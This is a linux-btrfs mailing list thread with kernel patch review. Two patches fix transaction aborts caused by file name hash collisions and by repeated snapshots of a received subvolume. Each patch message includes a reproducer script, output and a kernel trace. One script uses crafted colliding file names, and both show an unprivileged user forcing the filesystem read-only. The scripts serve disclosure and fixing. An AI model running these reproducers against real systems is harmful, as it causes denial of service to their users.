> > 'XKyH=OsOAF3p%uziGF_ZVr$ivrvhVgD@1u%5RtrV-gl_vqAwHkK@x7YwlxX3qT6WKKQ%PR56NrUBU2dOAOAdzr2=5nJuKPM-T-$ZpQfCL7phxQbUcb:BZOTPaFExc-qK-gDRCDW2'
> > 'd3uUR6OFEwZr%ns1XH_@tbxA@cCPmbBRLdyh7p6V45H$P2$F%w0RqrD3M0g8aGvWpoTFMiBdOTJXjD:JF7=h9a_43xBywYAP%r$SPZi%zDg%ql-KvkdUCtF9OLaQlxmd'
> > 'ePTpbnit%hyNm@WELlpKzNZYOzOTf8EQ$sEfkMy1VOfIUu3coyvIr13-Y7Sv5v-Ivax2Go_GQRFMU1b3362nktT9WOJf3SpT%z8sZmM3gvYQBDgmKI%%RM-G7hyrhgYflOw%z::ZRcv5O:lDCFm'
> > 'evqk743Y@dvZAiG5J05L_ROFV@$2%rVWJ2%3nxV72-W7$e$-SK3tuSHA2mBt$qloC5jwNx33GmQUjD%akhBPu=VJ5g$xhlZiaFtTrjeeM5x7dt4cHpX0cZkmfImndYzGmvwQG:$euFYmXn$_2rA9mKZ'
> > 'gkgUtnihWXsZQTEkrMAWIxir09k3t7jk_IK25t1:cy1XWN0GGqC%FrySdcmU7M8MuPO_ppkLw3=Dfr0UuBAL4%GFk2$Ma10V1jDRGJje%Xx9EV2ERaWKtjpwiZwh0gCSJsj5UL7CR8RtW5opCVFKGGy8Cky'
> > 'hNgsG_8lNRik3PvphqPm0yEH3P%%fYG:kQLY=6O-61Wa6nrV_WVGR6TLB09vHOv%g4VQRP8Gzx7VXUY1qvZyS'
> > 'isA7JVzN12xCxVPJZ_qoLm-pTBuhjjHMvV7o=F:EaClfYNyFGlsfw-Kf%uxdqW-kwk1sPl2vhbjyHU1A6$hz'
> > 'kiJ_fgcdZFDiOptjgH5PN9-PSyLO4fbk_:u5_2tz35lV_iXiJ6cx7pwjTtKy-XGaQ5IefmpJ4N_ZqGsqCsKuqOOBgf9LkUdffHet@Wu'
> > 'lvwtxyhE9:%Q3UxeHiViUyNzJsy:fm38pg_b6s25JvdhOAT=1s0$pG25x=LZ2rlHTszj=gN6M4zHZYr_qrB49i=pA--@WqWLIuX7o1S_SfS@2FSiUZN'
> > 'rC24cw3UBDZ=5qJBUMs9e$=S4Y94ni%Z8639vnrGp=0Hv4z3dNFL0fBLmQ40=EYIY:Z=SLc@QLMSt2zsss2ZXrP7j4='
> > 'uwGl2s-fFrf@GqS=DQqq2I0LJSsOmM%xzTjS:lzXguE3wChdMoHYtLRKPvfaPOZF2fER@j53evbKa7R%A7r4%YEkD=kicJe@SFiGtXHbKe4gCgPAYbnVn'
> > 'UG37U6KKua2bgc:IHzRs7BnB6FD:2Mt5Cc5NdlsW%$1tyvnfz7S27FvNkroXwAW:mBZLA1@qa9WnDbHCDmQmfPMC9z-Eq6QT0jhhPpqyymaD:R02ghwYo%yx7SAaaq-:x33LYpei$5g8DMl3C'
> > 'y2vjek0FE1PDJC0qpfnN:x8k2wCFZ9xiUF2ege=JnP98R%wxjKkdfEiLWvQzmnW'
> > '8-HCSgH5B%K7P8_jaVtQhBXpBk:pE-$P7ts58U0J@iR9YZntMPl7j$s62yAJO@_9eanFPS54b=UTw$94C-t=HLxT8n6o9P=QnIxq-f1=Ne2dvhe6WbjEQtc'
> > 'YPPh:IFt2mtR6XWSmjHptXL_hbSYu8bMw-JP8@PNyaFkdNFsk$M=xfL6LDKCDM-mSyGA_2MBwZ8Dr4=R1D%7-mCaaKGxb990jzaagRktDTyp'
> > '9hD2ApKa_t_7x-a@GCG28kY:7$M@5udI1myQ$x5udtggvagmCQcq9QXWRC5hoB0o-_zHQUqZI5rMcz_kbMgvN5jr63LeYA4Cj-c6F5Ugmx6DgVf@2Jqm%MafecpgooqreJ53P-QTS'
> > )
> >
> > # Now create files with all those names in the same parent directory.
> > # It should not fail since a 4K leaf has enough space for them.
> > for name in "${names[@]}"; do
> > touch $MNT/$name
> > done
> >
> > # Now add one more file name that causes a crc32c hash collision.
> > # This should fail, but it should not turn the filesystem into RO mode
> > # (which could be exploited by malicious users) due to a transaction
> > # abort.
> > touch $MNT/'W6tIm-VK2@BGC@IBfcgg6j_p:pxp_QUqtWpGD5Ok_GmijKOJJt'
> >
> > # Check that we are able to create another file, with a name that does not cause
> > # a crc32c hash collision.
> > echo -n "hello world" > $MNT/baz
> >
> > # Unmount and mount again, verify file baz exists and with the right content.
> > umount $MNT
> > mount $DEV $MNT
> > echo "File baz content: $(cat $MNT/baz)"
> >
> > umount $MNT
> >
> > When running the reproducer:
> >
> > $ ./exploit-hash-collisions.sh
> > (...)
> > touch: cannot touch '/mnt/sdi/W6tIm-VK2@BGC@IBfcgg6j_p:pxp_QUqtWpGD5Ok_GmijKOJJt': Value too large for defined data type
> > ./exploit-hash-collisions.sh: line 57: /mnt/sdi/baz: Read-only file system
> > cat: /mnt/sdi/baz: No such file or directory
> > File baz content:
> >
> > And the transaction abort stack trace in dmesg/syslog:
> >
> > $ dmesg
> > (...)
> > [758240.509761] ------------[ cut here ]------------
> > [758240.510668] BTRFS: Transaction aborted (error -75)
> > [758240.511577] WARNING: fs/btrfs/inode.c:6854 at btrfs_create_new_inode+0x805/0xb50 [btrfs], CPU#6: touch/888644
> > [758240.513513] Modules linked in: btrfs dm_zero (...)
> > [758240.523221] CPU: 6 UID: 0 PID: 888644 Comm: touch Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full)
> > [758240.524621] Tainted: [W]=WARN
> > [758240.525037] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014
> > [758240.526331] RIP: 0010:btrfs_create_new_inode+0x80b/0xb50 [btrfs]
> > [758240.527093] Code: 0f 82 cf (...)
> > [758240.529211] RSP: 0018:ffffce64418fbb48 EFLAGS: 00010292
> > [758240.529935] RAX: 00000000ffffffd3 RBX: 0000000000000000 RCX: 00000000ffffffb5
> > [758240.531040] RDX: 0000000d04f33e06 RSI: 00000000ffffffb5 RDI: ffffffffc0919dd0
> > [758240.531920] RBP: ffffce64418fbc10 R08: 0000000000000000 R09: 00000000ffffffb5
> > [758240.532928] R10: 0000000000000000 R11: ffff8e52c0000000 R12: ffff8e53eee7d0f0
> > [758240.533818] R13: ffff8e57f70932a0 R14: ffff8e5417629568 R15: 0000000000000000
> > [758240.534664] FS: 00007f1959a2a740(0000) GS:ffff8e5b27cae000(0000) knlGS:0000000000000000
> > [758240.535821] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> > [758240.536644] CR2: 00007f1959b10ce0 CR3: 000000012a2cc005 CR4: 0000000000370ef0
> > [758240.537517] Call Trace:
> > [758240.537828] <TASK>
> > [758240.538099] btrfs_create_common+0xbf/0x140 [btrfs]
> > [758240.538760] path_openat+0x111a/0x15b0
> > [758240.539252] do_filp_open+0xc2/0x170
> > [758240.539699] ? preempt_count_add+0x47/0xa0
> > [758240.540200] ? __virt_addr_valid+0xe4/0x1a0
> > [758240.540800] ? __check_object_size+0x1b3/0x230
> > [758240.541661] ? alloc_fd+0x118/0x180
> > [758240.542315] do_sys_openat2+0x70/0xd0
> > [758240.543012] __x64_sys_openat+0x50/0xa0
> > [758240.543723] do_syscall_64+0x50/0xf20
> > [758240.544462] entry_SYSCALL_64_after_hwframe+0x76/0x7e
> > [758240.545397] RIP: 0033:0x7f1959abc687
> > [758240.546019] Code: 48 89 fa (...)
> > [758240.548522] RSP: 002b:00007ffe16ff8690 EFLAGS: 00000202 ORIG_RAX: 0000000000000101
> > [758240.566278] RAX: ffffffffffffffda RBX: 00007f1959a2a740 RCX: 00007f1959abc687
> > [758240.567068] RDX: 0000000000000941 RSI: 00007ffe16ffa333 RDI: ffffffffffffff9c
> > [758240.567860] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
> > [758240.568707] R10: 00000000000001b6 R11: 0000000000000202 R12: 0000561eec7c4b90
> > [758240.569712] R13: 0000561eec7c311f R14: 00007ffe16ffa333 R15: 0000000000000000
> > [758240.570758] </TASK>
> > [758240.571040] ---[ end trace 0000000000000000 ]---
> > [758240.571681] BTRFS: error (device sdi state A) in btrfs_create_new_inode:6854: errno=-75 unknown
> > [758240.572899] BTRFS info (device sdi state EA): forced readonly
> >
> > Fix this by checking for hash collision, and if the adding a new name is
> > possible, early in btrfs_create_new_inode() before we do any tree updates,
> > so that we don't need to abort the transaction if we can not add the new
> > name due to the leaf size limit.
> >
> > A test case for fstests will be sent soon.
> >
> > Fixes: caae78e03234 ("btrfs: move common inode creation code into btrfs_create_new_inode()")
>
> This fix makes sense but I have two high level questions if you don't
> mind:
>
> I couldn't actually find the place EOVERFLOW is coming from.
> my best guess is:
>
> insert_with_overflow()
> btrfs_insert_empty_item()
> btrfs_insert_empty_items()
> btrfs_search_slot()
> search_leaf()
> split_leaf()
> if (extend && data_size + btrfs_item_size(l, slot) +
> sizeof(struct btrfs_item) > BTRFS_LEAF_DATA_SIZE(fs_info))
> return -EOVERFLOW;
>
> Is that right?
Yes.
> I am a bit confused how this doesn't get caught by the
> check before the call to split leaf
> i.e.,
> if (leaf_free_space < ins_len) // ctree.c:1951
I don't understand your doubt.
It's because the leaf doesn't have enough space that we call
split_leaf(), and that fails with the above if statement you
identified because the extended item size would not fit in a leaf.
>
>
> Also, would it theoretically be possible to extend the collision
> handling to allow collisions to span leaves or is there some reason that
> is complete no-go?
And how would you do that, without changing the on-disk format with
new keys and/or item types?
We would have to have new keys and the data split across several
items, like we did for extrefs over a decade ago.
Thanks.
>
> Regardless of the answers, this is well reasoned, well tested, and a
> clear imporovement so please add:
>
> Reviewed-by: Boris Burkov <boris@bur.io>
>
> > Signed-off-by: Filipe Manana <fdmanana@suse.com>
> > ---
> > fs/btrfs/inode.c | 19 +++++++++++++++++++
> > 1 file changed, 19 insertions(+)
> >
> > diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
> > index b9f1bd18ea62..9a26fc5a5263 100644
> > --- a/fs/btrfs/inode.c
> > +++ b/fs/btrfs/inode.c
> > @@ -6635,6 +6635,25 @@ int btrfs_create_new_inode(struct btrfs_trans_handle *trans,
> > int ret;
> > bool xa_reserved = false;
> >
> > + if (!args->orphan && !args->subvol) {
> > + /*
> > + * Before anything else, check if we can add the name to the
> > + * parent directory. We want to avoid a dir item overflow in
> > + * case we have an existing dir item due to existing name
> > + * hash collisions. We do this check here before we call
> > + * btrfs_add_link() down below so that we can avoid a
> > + * transaction abort (which could be exploited by malicious
> > + * users).
> > + *
> > + * For subvolumes we already do this in btrfs_mksubvol().
> > + */
> > + ret = btrfs_check_dir_item_collision(BTRFS_I(dir)->root,
> > + btrfs_ino(BTRFS_I(dir)),
> > + name);
> > + if (ret < 0)
> > + return ret;
> > + }
> > +
> > path = btrfs_alloc_path();
> > if (!path)
> > return -ENOMEM;
> > --
> > 2.47.2
> >
^ permalink raw reply [flat|nested] 15+ messages in thread
* Re: [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision
2026-02-26 21:24 ` Filipe Manana
@ 2026-02-26 21:29 ` Boris Burkov
0 siblings, 0 replies; 15+ messages in thread
From: Boris Burkov @ 2026-02-26 21:29 UTC (permalink / raw)
To: Filipe Manana; +Cc: linux-btrfs
On Thu, Feb 26, 2026 at 09:24:20PM +0000, Filipe Manana wrote:
> On Thu, Feb 26, 2026 at 6:54 PM Boris Burkov <boris@bur.io> wrote:
> >
> > On Thu, Feb 26, 2026 at 02:33:58PM +0000, fdmanana@kernel.org wrote:
> > > From: Filipe Manana <fdmanana@suse.com>
> > >
> > > If we attempt to create several files with names that result in the same
> > > hash, we have to pack them in same dir item and that has a limit inherent
> > > to the leaf size. However if we reach that limit, we trigger a transaction
> > > abort and turns the filesystem into RO mode. This allows for a malicious
> > > user to disrupt a system, without the need to have administration
> > > privileges/capabilities.
> > >
> > > Reproducer:
> > >
> > > $ cat exploit-hash-collisions.sh
> > > #!/bin/bash
> > >
> > > DEV=/dev/sdi
> > > MNT=/mnt/sdi
> > >
> > > # Use smallest node size to make the test faster and require less file
> > > # names that result in hash collision.
> > > mkfs.btrfs -f --nodesize 4K $DEV
> > > mount $DEV $MNT
> > >
> > > # List of names that result in the same crc32c hash for btrfs.
> > > declare -a names=(
> > > 'foobar'
> > > '%a8tYkxfGMLWRGr55QSeQc4PBNH9PCLIvR6jZnkDtUUru1t@RouaUe_L:@xGkbO3nCwvLNYeK9vhE628gss:T$yZjZ5l-Nbd6CbC$M=hqE-ujhJICXyIxBvYrIU9-TDC'
> > > 'AQci3EUB%shMsg-N%frgU:02ByLs=IPJU0OpgiWit5nexSyxZDncY6WB:=zKZuk5Zy0DD$Ua78%MelgBuMqaHGyKsJUFf9s=UW80PcJmKctb46KveLSiUtNmqrMiL9-Y0I_l5Fnam04CGIg=8@U:Z'
> > > 'CvVqJpJzueKcuA$wqwePfyu7VxuWNN3ho$p0zi2H8QFYK$7YlEqOhhb%:hHgjhIjW5vnqWHKNP4'
> > > 'ET:vk@rFU4tsvMB0$C_p=xQHaYZjvoF%-BTc%wkFW8yaDAPcCYoR%x$FH5O:' > 'HwTon%v7SGSP4FE08jBwwiu5aot2CFKXHTeEAa@38fUcNGOWvE@Mz6WBeDH_VooaZ6AgsXPkVGwy9l@@ZbNXabUU9csiWrrOp0MWUdfi$EZ3w9GkIqtz7I_eOsByOkBOO'
> > > 'Ij%2VlFGXSuPvxJGf5UWy6O@1svxGha%b@=%wjkq:CIgE6u7eJOjmQY5qTtxE2Rjbis9@us'
> > > 'KBkjG5%9R8K9sOG8UTnAYjxLNAvBmvV5vz3IiZaPmKuLYO03-6asI9lJ_j4@6Xo$KZicaLWJ3Pv8XEwVeUPMwbHYWwbx0pYvNlGMO9F:ZhHAwyctnGy%_eujl%WPd4U2BI7qooOSr85J-C2V$LfY'
> > > 'NcRfDfuUQ2=zP8K3CCF5dFcpfiOm6mwenShsAb_F%n6GAGC7fT2JFFn:c35X-3aYwoq7jNX5$ZJ6hI3wnZs$7KgGi7wjulffhHNUxAT0fRRLF39vJ@NvaEMxsMO'
> > > 'Oj42AQAEzRoTxa5OuSKIr=A_lwGMy132v4g3Pdq1GvUG9874YseIFQ6QU'
> > > 'Ono7avN5GjC:_6dBJ_'
> > > 'WHmN2gnmaN-9dVDy4aWo:yNGFzz8qsJyJhWEWcud7$QzN2D9R0efIWWEdu5kwWr73NZm4=@CoCDxrrZnRITr-kGtU_cfW2:%2_am'
> > > 'WiFnuTEhAG9FEC6zopQmj-A-$LDQ0T3WULz%ox3UZAPybSV6v1Z$b4L_XBi4M4BMBtJZpz93r9xafpB77r:lbwvitWRyo$odnAUYlYMmU4RvgnNd--e=I5hiEjGLETTtaScWlQp8mYsBovZwM2k'
> > > 'XKyH=OsOAF3p%uziGF_ZVr$ivrvhVgD@1u%5RtrV-gl_vqAwHkK@x7YwlxX3qT6WKKQ%PR56NrUBU2dOAOAdzr2=5nJuKPM-T-$ZpQfCL7phxQbUcb:BZOTPaFExc-qK-gDRCDW2'
> > > 'd3uUR6OFEwZr%ns1XH_@tbxA@cCPmbBRLdyh7p6V45H$P2$F%w0RqrD3M0g8aGvWpoTFMiBdOTJXjD:JF7=h9a_43xBywYAP%r$SPZi%zDg%ql-KvkdUCtF9OLaQlxmd'
> > > 'ePTpbnit%hyNm@WELlpKzNZYOzOTf8EQ$sEfkMy1VOfIUu3coyvIr13-Y7Sv5v-Ivax2Go_GQRFMU1b3362nktT9WOJf3SpT%z8sZmM3gvYQBDgmKI%%RM-G7hyrhgYflOw%z::ZRcv5O:lDCFm'
> > > 'evqk743Y@dvZAiG5J05L_ROFV@$2%rVWJ2%3nxV72-W7$e$-SK3tuSHA2mBt$qloC5jwNx33GmQUjD%akhBPu=VJ5g$xhlZiaFtTrjeeM5x7dt4cHpX0cZkmfImndYzGmvwQG:$euFYmXn$_2rA9mKZ'
> > > 'gkgUtnihWXsZQTEkrMAWIxir09k3t7jk_IK25t1:cy1XWN0GGqC%FrySdcmU7M8MuPO_ppkLw3=Dfr0UuBAL4%GFk2$Ma10V1jDRGJje%Xx9EV2ERaWKtjpwiZwh0gCSJsj5UL7CR8RtW5opCVFKGGy8Cky'
> > > 'hNgsG_8lNRik3PvphqPm0yEH3P%%fYG:kQLY=6O-61Wa6nrV_WVGR6TLB09vHOv%g4VQRP8Gzx7VXUY1qvZyS'
> > > 'isA7JVzN12xCxVPJZ_qoLm-pTBuhjjHMvV7o=F:EaClfYNyFGlsfw-Kf%uxdqW-kwk1sPl2vhbjyHU1A6$hz'
> > > 'kiJ_fgcdZFDiOptjgH5PN9-PSyLO4fbk_:u5_2tz35lV_iXiJ6cx7pwjTtKy-XGaQ5IefmpJ4N_ZqGsqCsKuqOOBgf9LkUdffHet@Wu'
> > > 'lvwtxyhE9:%Q3UxeHiViUyNzJsy:fm38pg_b6s25JvdhOAT=1s0$pG25x=LZ2rlHTszj=gN6M4zHZYr_qrB49i=pA--@WqWLIuX7o1S_SfS@2FSiUZN'
> > > 'rC24cw3UBDZ=5qJBUMs9e$=S4Y94ni%Z8639vnrGp=0Hv4z3dNFL0fBLmQ40=EYIY:Z=SLc@QLMSt2zsss2ZXrP7j4='
> > > 'uwGl2s-fFrf@GqS=DQqq2I0LJSsOmM%xzTjS:lzXguE3wChdMoHYtLRKPvfaPOZF2fER@j53evbKa7R%A7r4%YEkD=kicJe@SFiGtXHbKe4gCgPAYbnVn'
> > > 'UG37U6KKua2bgc:IHzRs7BnB6FD:2Mt5Cc5NdlsW%$1tyvnfz7S27FvNkroXwAW:mBZLA1@qa9WnDbHCDmQmfPMC9z-Eq6QT0jhhPpqyymaD:R02ghwYo%yx7SAaaq-:x33LYpei$5g8DMl3C'
> > > 'y2vjek0FE1PDJC0qpfnN:x8k2wCFZ9xiUF2ege=JnP98R%wxjKkdfEiLWvQzmnW'
> > > '8-HCSgH5B%K7P8_jaVtQhBXpBk:pE-$P7ts58U0J@iR9YZntMPl7j$s62yAJO@_9eanFPS54b=UTw$94C-t=HLxT8n6o9P=QnIxq-f1=Ne2dvhe6WbjEQtc'
> > > 'YPPh:IFt2mtR6XWSmjHptXL_hbSYu8bMw-JP8@PNyaFkdNFsk$M=xfL6LDKCDM-mSyGA_2MBwZ8Dr4=R1D%7-mCaaKGxb990jzaagRktDTyp'
> > > '9hD2ApKa_t_7x-a@GCG28kY:7$M@5udI1myQ$x5udtggvagmCQcq9QXWRC5hoB0o-_zHQUqZI5rMcz_kbMgvN5jr63LeYA4Cj-c6F5Ugmx6DgVf@2Jqm%MafecpgooqreJ53P-QTS'
> > > )
> > >
> > > # Now create files with all those names in the same parent directory.
> > > # It should not fail since a 4K leaf has enough space for them.
> > > for name in "${names[@]}"; do
> > > touch $MNT/$name
> > > done
> > >
> > > # Now add one more file name that causes a crc32c hash collision.
> > > # This should fail, but it should not turn the filesystem into RO mode
> > > # (which could be exploited by malicious users) due to a transaction
> > > # abort.
> > > touch $MNT/'W6tIm-VK2@BGC@IBfcgg6j_p:pxp_QUqtWpGD5Ok_GmijKOJJt'
> > >
> > > # Check that we are able to create another file, with a name that does not cause
> > > # a crc32c hash collision.
> > > echo -n "hello world" > $MNT/baz
> > >
> > > # Unmount and mount again, verify file baz exists and with the right content.
> > > umount $MNT
> > > mount $DEV $MNT
> > > echo "File baz content: $(cat $MNT/baz)"
> > >
> > > umount $MNT
> > >
> > > When running the reproducer:
> > >
> > > $ ./exploit-hash-collisions.sh
> > > (...)
> > > touch: cannot touch '/mnt/sdi/W6tIm-VK2@BGC@IBfcgg6j_p:pxp_QUqtWpGD5Ok_GmijKOJJt': Value too large for defined data type
> > > ./exploit-hash-collisions.sh: line 57: /mnt/sdi/baz: Read-only file system
> > > cat: /mnt/sdi/baz: No such file or directory
> > > File baz content:
> > >
> > > And the transaction abort stack trace in dmesg/syslog:
> > >
> > > $ dmesg
> > > (...)
> > > [758240.509761] ------------[ cut here ]------------
> > > [758240.510668] BTRFS: Transaction aborted (error -75)
> > > [758240.511577] WARNING: fs/btrfs/inode.c:6854 at btrfs_create_new_inode+0x805/0xb50 [btrfs], CPU#6: touch/888644
> > > [758240.513513] Modules linked in: btrfs dm_zero (...)
> > > [758240.523221] CPU: 6 UID: 0 PID: 888644 Comm: touch Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full)
> > > [758240.524621] Tainted: [W]=WARN
> > > [758240.525037] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014
> > > [758240.526331] RIP: 0010:btrfs_create_new_inode+0x80b/0xb50 [btrfs]
> > > [758240.527093] Code: 0f 82 cf (...)
> > > [758240.529211] RSP: 0018:ffffce64418fbb48 EFLAGS: 00010292
> > > [758240.529935] RAX: 00000000ffffffd3 RBX: 0000000000000000 RCX: 00000000ffffffb5
> > > [758240.531040] RDX: 0000000d04f33e06 RSI: 00000000ffffffb5 RDI: ffffffffc0919dd0
> > > [758240.531920] RBP: ffffce64418fbc10 R08: 0000000000000000 R09: 00000000ffffffb5
> > > [758240.532928] R10: 0000000000000000 R11: ffff8e52c0000000 R12: ffff8e53eee7d0f0
> > > [758240.533818] R13: ffff8e57f70932a0 R14: ffff8e5417629568 R15: 0000000000000000
> > > [758240.534664] FS: 00007f1959a2a740(0000) GS:ffff8e5b27cae000(0000) knlGS:0000000000000000
> > > [758240.535821] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> > > [758240.536644] CR2: 00007f1959b10ce0 CR3: 000000012a2cc005 CR4: 0000000000370ef0
> > > [758240.537517] Call Trace:
> > > [758240.537828] <TASK>
> > > [758240.538099] btrfs_create_common+0xbf/0x140 [btrfs]
> > > [758240.538760] path_openat+0x111a/0x15b0
> > > [758240.539252] do_filp_open+0xc2/0x170
> > > [758240.539699] ? preempt_count_add+0x47/0xa0
> > > [758240.540200] ? __virt_addr_valid+0xe4/0x1a0
> > > [758240.540800] ? __check_object_size+0x1b3/0x230
> > > [758240.541661] ? alloc_fd+0x118/0x180
> > > [758240.542315] do_sys_openat2+0x70/0xd0
> > > [758240.543012] __x64_sys_openat+0x50/0xa0
> > > [758240.543723] do_syscall_64+0x50/0xf20
> > > [758240.544462] entry_SYSCALL_64_after_hwframe+0x76/0x7e
> > > [758240.545397] RIP: 0033:0x7f1959abc687
> > > [758240.546019] Code: 48 89 fa (...)
> > > [758240.548522] RSP: 002b:00007ffe16ff8690 EFLAGS: 00000202 ORIG_RAX: 0000000000000101
> > > [758240.566278] RAX: ffffffffffffffda RBX: 00007f1959a2a740 RCX: 00007f1959abc687
> > > [758240.567068] RDX: 0000000000000941 RSI: 00007ffe16ffa333 RDI: ffffffffffffff9c
> > > [758240.567860] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
> > > [758240.568707] R10: 00000000000001b6 R11: 0000000000000202 R12: 0000561eec7c4b90
> > > [758240.569712] R13: 0000561eec7c311f R14: 00007ffe16ffa333 R15: 0000000000000000
> > > [758240.570758] </TASK>
> > > [758240.571040] ---[ end trace 0000000000000000 ]---
> > > [758240.571681] BTRFS: error (device sdi state A) in btrfs_create_new_inode:6854: errno=-75 unknown
> > > [758240.572899] BTRFS info (device sdi state EA): forced readonly
> > >
> > > Fix this by checking for hash collision, and if the adding a new name is
> > > possible, early in btrfs_create_new_inode() before we do any tree updates,
> > > so that we don't need to abort the transaction if we can not add the new
> > > name due to the leaf size limit.
> > >
> > > A test case for fstests will be sent soon.
> > >
> > > Fixes: caae78e03234 ("btrfs: move common inode creation code into btrfs_create_new_inode()")
> >
> > This fix makes sense but I have two high level questions if you don't
> > mind:
> >
> > I couldn't actually find the place EOVERFLOW is coming from.
> > my best guess is:
> >
> > insert_with_overflow()
> > btrfs_insert_empty_item()
> > btrfs_insert_empty_items()
> > btrfs_search_slot()
> > search_leaf()
> > split_leaf()
> > if (extend && data_size + btrfs_item_size(l, slot) +
> > sizeof(struct btrfs_item) > BTRFS_LEAF_DATA_SIZE(fs_info))
> > return -EOVERFLOW;
> >
> > Is that right?
>
> Yes.
>
Thanks
> > I am a bit confused how this doesn't get caught by the
> > check before the call to split leaf
> > i.e.,
> > if (leaf_free_space < ins_len) // ctree.c:1951
>
> I don't understand your doubt.
> It's because the leaf doesn't have enough space that we call
> split_leaf(), and that fails with the above if statement you
> identified because the extended item size would not fit in a leaf.
>
> >
> >
> > Also, would it theoretically be possible to extend the collision
> > handling to allow collisions to span leaves or is there some reason that
> > is complete no-go?
>
> And how would you do that, without changing the on-disk format with
> new keys and/or item types?
> We would have to have new keys and the data split across several
> items, like we did for extrefs over a decade ago.
Yup, makes sense, you're right.
>
> Thanks.
>
> >
> > Regardless of the answers, this is well reasoned, well tested, and a
> > clear imporovement so please add:
> >
> > Reviewed-by: Boris Burkov <boris@bur.io>
> >
> > > Signed-off-by: Filipe Manana <fdmanana@suse.com>
> > > ---
> > > fs/btrfs/inode.c | 19 +++++++++++++++++++
> > > 1 file changed, 19 insertions(+)
> > >
> > > diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
> > > index b9f1bd18ea62..9a26fc5a5263 100644
> > > --- a/fs/btrfs/inode.c
> > > +++ b/fs/btrfs/inode.c
> > > @@ -6635,6 +6635,25 @@ int btrfs_create_new_inode(struct btrfs_trans_handle *trans,
> > > int ret;
> > > bool xa_reserved = false;
> > >
> > > + if (!args->orphan && !args->subvol) {
> > > + /*
> > > + * Before anything else, check if we can add the name to the
> > > + * parent directory. We want to avoid a dir item overflow in
> > > + * case we have an existing dir item due to existing name
> > > + * hash collisions. We do this check here before we call
> > > + * btrfs_add_link() down below so that we can avoid a
> > > + * transaction abort (which could be exploited by malicious
> > > + * users).
> > > + *
> > > + * For subvolumes we already do this in btrfs_mksubvol().
> > > + */
> > > + ret = btrfs_check_dir_item_collision(BTRFS_I(dir)->root,
> > > + btrfs_ino(BTRFS_I(dir)),
> > > + name);
> > > + if (ret < 0)
> > > + return ret;
> > > + }
> > > +
> > > path = btrfs_alloc_path();
> > > if (!path)
> > > return -ENOMEM;
> > > --
> > > 2.47.2
> > >
^ permalink raw reply [flat|nested] 15+ messages in thread
* Re: [PATCH 2/5] btrfs: fix transaction abort when snapshotting received subvolumes
2026-02-26 20:40 ` Qu Wenruo
@ 2026-02-26 21:30 ` Filipe Manana
0 siblings, 0 replies; 15+ messages in thread
From: Filipe Manana @ 2026-02-26 21:30 UTC (permalink / raw)
To: Qu Wenruo; +Cc: linux-btrfs
On Thu, Feb 26, 2026 at 8:40 PM Qu Wenruo <quwenruo.btrfs@gmx.com> wrote:
>
>
>
> 在 2026/2/27 01:03, fdmanana@kernel.org 写道:
> > From: Filipe Manana <fdmanana@suse.com>
> >
> > Currently a user can trigger a transaction abort by snapshotting a
> > previously received snapshot a bunch of times until we reach a
> > BTRFS_UUID_KEY_RECEIVED_SUBVOL item overflow (the maximum item size we
> > can store in a leaf). This is very likely not common in practice, but
> > if it happens, it turns the filesystem into RO mode. The snapshot, send
> > and set_received_subvol and subvol_setflags (used by receive) don't
> > require CAP_SYS_ADMIN, just inode_owner_or_capable(). A malicious user
> > could use this to turn a filesystem into RO mode and disrupt a system.
> >
> > Reproducer script:
> >
> > $ cat test.sh
> > #!/bin/bash
> >
> > DEV=/dev/sdi
> > MNT=/mnt/sdi
> >
> > # Use smallest node size to make the test faster.
> > mkfs.btrfs -f --nodesize 4K $DEV
> > mount $DEV $MNT
> >
> > # Create a subvolume and set it to RO so that it can be used for send.
> > btrfs subvolume create $MNT/sv
> > touch $MNT/sv/foo
> > btrfs property set $MNT/sv ro true
> >
> > # Send and receive the subvolume into snaps/sv.
> > mkdir $MNT/snaps
> > btrfs send $MNT/sv | btrfs receive $MNT/snaps
> >
> > # Now snapshot the received subvolume, which has a received_uuid, a
> > # lot of times to trigger the leaf overflow.
> > total=500
> > for ((i = 1; i <= $total; i++)); do
> > echo -ne "\rCreating snapshot $i/$total"
> > btrfs subvolume snapshot -r $MNT/snaps/sv $MNT/snaps/sv_$i > /dev/null
> > done
> > echo
> >
> > umount $MNT
> >
> > When running the test:
> >
> > $ ./test.sh
> > (...)
> > Create subvolume '/mnt/sdi/sv'
> > At subvol /mnt/sdi/sv
> > At subvol sv
> > Creating snapshot 496/500ERROR: Could not create subvolume: Value too large for defined data type
> > Creating snapshot 497/500ERROR: Could not create subvolume: Read-only file system
> > Creating snapshot 498/500ERROR: Could not create subvolume: Read-only file system
> > Creating snapshot 499/500ERROR: Could not create subvolume: Read-only file system
> > Creating snapshot 500/500ERROR: Could not create subvolume: Read-only file system
> >
> > And in dmesg/syslog:
> >
> > $ dmesg
> > (...)
> > [251067.627338] BTRFS warning (device sdi): insert uuid item failed -75 (0x4628b21c4ac8d898, 0x2598bee2b1515c91) type 252!
> > [251067.629212] ------------[ cut here ]------------
> > [251067.630033] BTRFS: Transaction aborted (error -75)
> > [251067.630871] WARNING: fs/btrfs/transaction.c:1907 at create_pending_snapshot.cold+0x52/0x465 [btrfs], CPU#10: btrfs/615235
> > [251067.632851] Modules linked in: btrfs dm_zero (...)
> > [251067.644071] CPU: 10 UID: 0 PID: 615235 Comm: btrfs Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full)
> > [251067.646165] Tainted: [W]=WARN
> > [251067.646733] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014
> > [251067.648735] RIP: 0010:create_pending_snapshot.cold+0x55/0x465 [btrfs]
> > [251067.649984] Code: f0 48 0f (...)
> > [251067.653313] RSP: 0018:ffffce644908fae8 EFLAGS: 00010292
